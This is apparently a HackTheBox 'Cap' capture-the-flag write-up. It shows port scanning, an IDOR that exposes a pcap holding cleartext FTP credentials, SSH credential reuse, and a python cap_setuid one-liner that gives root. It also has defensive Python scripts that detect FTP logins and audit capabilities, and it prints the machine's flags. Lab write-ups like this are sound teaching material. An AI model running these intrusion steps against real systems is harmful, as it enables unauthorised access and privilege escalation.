# Cap

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FGvmoONWU5oGzkeMKGYX2%2F70ea3357a2d090af11a0953ec8717e90.png?alt=media&#x26;token=ab1c441f-2d5b-401a-bf1e-ff73a87f7253" alt=""><figcaption></figcaption></figure>

## Enumeration:

### Port Scanning:

As always, we start by scanning the machine for open ports with `nmap`:

```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.6.226
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 22:47 EST
Nmap scan report for 10.129.6.226                                                                                                                                           
Host is up, received echo-reply ttl 63 (0.20s latency).                                                                                                                     
Scanned at 2026-01-21 22:47:58 EST for 84s                                                                                                                                  
Not shown: 65532 closed tcp ports (reset)                                                                                                                                   
PORT   STATE SERVICE REASON         VERSION                                                                                                                                 
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2vrva1a+HtV5SnbxxtZSs+D8/EXPL2wiqOUG2ngq9zaPlF6cuLX3P2QYvGfh5bcAIVjIqNUmmc1eSHVxtbmNEQjyJdjZOP4i2IfX/RZUA18dWTfEWlNaoVDGBsc8zunvFk3
nkyaynnXmlH7n3BLb1nRNyxtouW+q7VzhA6YK3ziOD6tXT7MMnDU7CfG1PfMqdU297OVP35BODg1gZawthjxMi5i5R1g3nyODudFoWaHu9GZ3D/dSQbMAxsly98L1Wr6YJ6M6xfqDurgOAl9i6TZ4zx93c/h1MO+mKH7EobPR/ZW
rFGLeVFZbB6jYEflCty8W8Dwr7HOdF1gULr+Mj+BcykLlzPoEhD7YqjRBm8SHdicPP1huq+/3tN7Q/IOf68NNJDdeq6QuGKh1CKqloT/+QZzZcJRubxULUg8YLGsYUHd1umySv4cHHEXRl7vcZJst78eBqnYUtN3MweQr4ga1kQP
4YZK5qUQCTPPmrKMa9NPh1sjHSdS8IwiH12V0=
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqG/RCH23t5Pr9sw6dCqvySMHEjxwCfMzBDypoNIMIa8iKYAe84s/X7vDbA9T/vtGDYzS+fw8I5MAGpX8deeKI=
|   256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPbLTiQl+6W0EOi8vS+sByUiZdBsuz0v/7zITtSuaTFH
80/tcp open  http    syn-ack ttl 63 Gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

We have only three open ports: FTP on port 21, SSH on port 22, and HTTP on port 80.

Since `nmap` did not report that anonymous login is enabled, we will skip FTP for now.

### HTTP (80):

Let's start by taking a look at the website to see how it functions:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FF4dGbqZGnNcQoxqjqFlO%2Fimage.png?alt=media&#x26;token=01d51582-2b42-49b2-b048-11f561efdbc7" alt=""><figcaption></figcaption></figure>

We are already logged in as nathan without ever having authenticated. This dashboard page is static.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fob69yi5j3VEwaDSV9d7o%2Fimage.png?alt=media&#x26;token=8fb71321-1ff7-4e68-be02-a12018a27a44" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FCoZlFDl57PHpQJjUfYWb%2Fimage.png?alt=media&#x26;token=2e641d87-859b-480d-ac04-a1f7966ee31c" alt=""><figcaption></figcaption></figure>

These are static pages as well: system commands are executed on the underlying operating system and their output is printed to us, but there are no parameters we can send to manipulate them into command execution.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FfsGRcRcItRj0cGx3CRmu%2Fimage.png?alt=media&#x26;token=837616ab-090d-444a-abef-5fd443a8634d" alt=""><figcaption></figcaption></figure>

Here we have a packet capture we can download. The URL references data ID 1 and nothing ties that ID to our session, so we can also try other IDs such as 0 or 2.

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FqJYAD9sADnyin5acYyGS%2Fimage.png?alt=media&#x26;token=d979403b-4bd6-4328-af0f-74af20ef3375" alt=""><figcaption></figcaption></figure>

We have something under 0 as well, but nothing after 1.

I downloaded both files; let's inspect them for anything useful to us.

### Wireshark:

### 1.pcap:

It contains nothing of interest, only captured HTTP traffic for the HTML pages.

### 0.pcap:

Open up the file with `wireshark`:

```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ wireshark 0.pcap
```

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FObxFHb1qRzcmps0ehKsC%2Fimage.png?alt=media&#x26;token=ad58622d-a0c3-4dc8-bed4-4df15f4b99af" alt=""><figcaption></figcaption></figure>

Let's find out which protocols this capture contains via Statistics > Protocol Hierarchy:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FgS2PJz5gXg7XCSqm9QAo%2Fimage.png?alt=media&#x26;token=ea49d19d-6325-42e1-bdc0-02ee7cc297f9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fh8rBaerCMKbnrJwB9T5s%2Fimage.png?alt=media&#x26;token=8aee3589-849a-4858-9625-63abcb06f614" alt=""><figcaption></figcaption></figure>

Interestingly, FTP traffic was captured. As we all know, FTP sends credentials and data in cleartext, so anyone able to intercept the traffic can read them; `sftp` or FTPS should be used instead to mitigate interception.

Right-click an FTP packet and choose Follow > TCP Stream:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FqsKNRQDqGY3wb32rIJiP%2Fimage.png?alt=media&#x26;token=cd9c9d0d-df22-426e-9d2d-041ee9eef47f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FObMBXbFHKAeTth6AKZOL%2Fimage.png?alt=media&#x26;token=c66c5353-91c8-40d3-8d88-e9b635d6b1f3" alt=""><figcaption></figcaption></figure>
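The Follow TCP Stream step above is a manual check on one file. As an added example (my own code, not part of the original writeup or of the Cap machine), here is a dependency-free pcap reader that scans a capture for FTP `USER`/`PASS` commands sent to port 21 and reports them the way a detection job would: it records the username and the fact that a password crossed the wire in cleartext, but does not copy the password itself into the finding. The capture bytes, IP addresses, and password below are constructed for the demo; they are not the `0.pcap` from the machine.

```python
import struct

PCAP_MAGIC_LE = 0xA1B2C3D4  # little-endian classic pcap magic (the common case)
LINKTYPE_ETHERNET = 1
FTP_PORT = 21


def build_frame(src_ip, dst_ip, sport, dport, payload):
    """Build an Ethernet/IPv4/TCP frame around payload. Constructed test data:
    checksums stay zero because the reader below never verifies them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp  # dummy MACs, ethertype IPv4


def build_pcap(frames):
    """Wrap frames in a classic pcap file (global header + per-record headers)."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for ts, frame in enumerate(frames):
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp_segments(pcap_bytes):
    """Yield (src_ip, dst_ip, sport, dport, payload) for each IPv4/TCP record."""
    magic = struct.unpack("<I", pcap_bytes[:4])[0]
    endian = "<" if magic == PCAP_MAGIC_LE else ">"
    if struct.unpack(endian + "I", pcap_bytes[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled by this reader")
    off = 24
    while off + 16 <= len(pcap_bytes):
        incl_len = struct.unpack(endian + "I", pcap_bytes[off + 8:off + 12])[0]
        frame = pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue  # not IPv4 over Ethernet, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        ip_total = struct.unpack("!H", frame[16:18])[0]
        src = ".".join(str(b) for b in frame[26:30])
        dst = ".".join(str(b) for b in frame[30:34])
        tcp = 14 + ihl
        sport, dport = struct.unpack("!HH", frame[tcp:tcp + 4])
        data_off = (frame[tcp + 12] >> 4) * 4
        yield src, dst, sport, dport, frame[tcp + data_off:14 + ip_total]


def find_cleartext_ftp_logins(pcap_bytes):
    """Report FTP USER/PASS commands sent to port 21. The password value itself
    is deliberately not copied into the finding, only its presence and length."""
    findings = []
    for src, dst, sport, dport, payload in iter_tcp_segments(pcap_bytes):
        if dport != FTP_PORT:
            continue
        for line in payload.split(b"\r\n"):
            verb, _, arg = line.partition(b" ")
            if verb.upper() == b"USER":
                findings.append({"client": src, "server": dst, "event": "ftp-user",
                                 "user": arg.decode("ascii", "replace")})
            elif verb.upper() == b"PASS":
                findings.append({"client": src, "server": dst,
                                 "event": "ftp-cleartext-password", "length": len(arg)})
    return findings


# Constructed sample capture (not the machine's 0.pcap): server banner, a login,
# and an unrelated HTTP request that the detector must ignore.
CLIENT, SERVER = "10.0.0.5", "10.0.0.21"
SAMPLE_PCAP = build_pcap([
    build_frame(SERVER, CLIENT, 21, 40000, b"220 (vsFTPd 3.0.3)\r\n"),
    build_frame(CLIENT, SERVER, 40000, 21, b"USER nathan\r\n"),
    build_frame(CLIENT, SERVER, 40000, 21, b"PASS s3cret-demo\r\n"),
    build_frame(CLIENT, SERVER, 40001, 80, b"GET /data/1 HTTP/1.1\r\n\r\n"),
])

if __name__ == "__main__":
    for finding in find_cleartext_ftp_logins(SAMPLE_PCAP):
        print(finding)
```

To run it against a real file, replace `SAMPLE_PCAP` with `open("0.pcap", "rb").read()`; the reader handles classic pcap only (not pcapng) and only Ethernet link types, which is what a typical `tcpdump -i eth0 -w` capture produces.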

### FTP (21):

Let's authenticate to FTP with those credentials:

```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ ftp nathan@10.129.6.226
Connected to 10.129.6.226.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||52048|)
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 May 27  2021 .
drwxr-xr-x    3 0        0            4096 May 23  2021 ..
lrwxrwxrwx    1 0        0               9 May 15  2021 .bash_history -> /dev/null
-rw-r--r--    1 1001     1001          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1001     1001         3771 Feb 25  2020 .bashrc
drwx------    2 1001     1001         4096 May 23  2021 .cache
-rw-r--r--    1 1001     1001          807 Feb 25  2020 .profile 
lrwxrwxrwx    1 0        0               9 May 27  2021 .viminfo -> /dev/null     
-r--------    1 1001     1001           33 Jan 22 03:46 user.txt
226 Directory send OK.                                                                
ftp> cd ..                      
250 Directory successfully changed.
ftp> ls                                
229 Entering Extended Passive Mode (|||46589|)                                        
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 May 27  2021 nathan
226 Directory send OK.               
ftp> exit                           
221 Goodbye.
```

We can see the FTP root maps directly onto the underlying filesystem (nathan's home directory), so we can browse system files.

Let's check whether those credentials were reused for SSH:

```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ nxc ssh 10.129.6.226 -u nathan -p 'Buck3tH4TF0RM3!'            
SSH         10.129.6.226    22     10.129.6.226     [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2
SSH         10.129.6.226    22     10.129.6.226     [+] nathan:Buck3tH4TF0RM3!  Linux - Shell access!
```

Indeed we have access.

### SSH (22):

`SSH` to the server:

```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cap]
└─$ ssh nathan@10.129.6.226
The authenticity of host '10.129.6.226 (10.129.6.226)' can't be established.
ED25519 key fingerprint is: SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI
This key is not known by any other names.                                             
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.6.226' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
nathan@10.129.6.226's password: Buck3tH4TF0RM3!
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jan 22 03:57:23 UTC 2026
  
<snipped>
nathan@cap:~$
```

## Post-Exploitation:

Let's do some local enumeration:

```bash
nathan@cap:~$ ls -la
total 28
drwxr-xr-x 3 nathan nathan 4096 May 27  2021 .
drwxr-xr-x 3 root   root   4096 May 23  2021 ..
lrwxrwxrwx 1 root   root      9 May 15  2021 .bash_history -> /dev/null
-rw-r--r-- 1 nathan nathan  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 nathan nathan 3771 Feb 25  2020 .bashrc
drwx------ 2 nathan nathan 4096 May 23  2021 .cache
-rw-r--r-- 1 nathan nathan  807 Feb 25  2020 .profile
lrwxrwxrwx 1 root   root      9 May 27  2021 .viminfo -> /dev/null
-r-------- 1 nathan nathan   33 Jan 22 03:46 user.txt
```

We cannot execute commands with `sudo` as nathan:

```bash
nathan@cap:~$ sudo -l
[sudo] password for nathan: 
Sorry, user nathan may not run sudo on cap.
```

Let's find out which SUID binaries we have:

```bash
nathan@cap:~$ find / -perm -u=s -type f 2>/dev/null | grep -v snap
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/at
/usr/bin/chsh
/usr/bin/su
/usr/bin/fusermount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper 
/usr/lib/eject/dmcrypt-get-device
```

None of these help.

The machine's name, Cap, may be a hint towards Linux capabilities:

```bash
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
```

Here python has file capabilities set: `cap_setuid` lets the interpreter change its own UID, so any user who can run it can escalate to root.

We can search online for the python commands, or use GTFOBins as always:
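The `getcap -r /` listing above has to be read by eye. As an added example (my own code, not part of the original writeup), here is a small auditor that parses `getcap` output in both the older `path = caps+flags` and the newer libcap `path caps=flags` formats and flags binaries carrying a root-equivalent capability in their permitted or effective set, which is exactly what makes `/usr/bin/python3.8` dangerous here. The sample lines are the ones from the writeup plus one constructed benign entry; the list of root-equivalent capabilities is my own audit shortlist, not an exhaustive one.

```python
import re

# Capabilities that, when any user can run the binary, amount to root
# (constructed audit shortlist, not the full capabilities(7) list).
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}

# One cap_to_text(3) clause: "cap_a,cap_b" followed by an operator and flags.
CLAUSE_RE = re.compile(r"(?P<caps>[a-z0-9_,]+)(?P<op>[+=-])(?P<flags>[eip]*)")


def parse_getcap_line(line):
    """Return (path, {cap: set(flags)}) for one getcap output line, or None."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:                      # older libcap: "/path = caps+flags"
        path, rest = line.split(" = ", 1)
    else:                                  # newer libcap: "/path caps=flags"
        path, _, rest = line.partition(" ")
    caps = {}
    for m in CLAUSE_RE.finditer(rest):
        flagset = set(m.group("flags"))
        for cap in m.group("caps").split(","):
            if m.group("op") == "-":
                caps.setdefault(cap, set()).difference_update(flagset)
            else:
                caps.setdefault(cap, set()).update(flagset)
    return path, caps


def audit(getcap_output):
    """List (path, [risky caps]) for binaries whose permitted ('p') or effective
    ('e') set holds a root-equivalent capability. A permitted-only cap is still
    usable, since the program can raise it into its effective set itself;
    an inheritable-only cap ('i') is not gained at exec by an ordinary user."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        risky = sorted(c for c, f in caps.items() if c in ROOT_EQUIVALENT and f & {"p", "e"})
        if risky:
            findings.append((path, risky))
    return findings


# Sample input: the writeup's getcap lines plus one constructed benign entry.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/local/bin/example-helper = cap_sys_admin+i
"""

if __name__ == "__main__":
    for path, risky in audit(SAMPLE_GETCAP):
        print(f"{path}: root-equivalent capability {', '.join(risky)}")
```

On a live host, feed it `getcap -r / 2>/dev/null` and treat every finding as a root-equivalent path for whoever can execute that file. The fix on Cap is to drop the capability with `setcap -r /usr/bin/python3.8`; if a service genuinely needs `cap_net_bind_service`, grant only that capability to a dedicated, non-interpreter binary rather than to a general-purpose interpreter that any user can run.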

{% embed url="https://gtfobins.org/gtfobins/python/" %}

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FxhUwIswzc1HxfPXWmBFL%2Fimage.png?alt=media&#x26;token=960e8c61-6119-4b09-ab3e-64ccd7d2d365" alt=""><figcaption></figcaption></figure>

Execute that command:

```bash
nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'
# whoami
root
```

We are root.

Get the flags:

```bash
nathan@cap:~$ cat user.txt                                                                                                                                                  
473ad4c57b0f565f262485fa1c26baf0
# cat root.txt
8e9a680ac44815519a99ceb271636d81
```
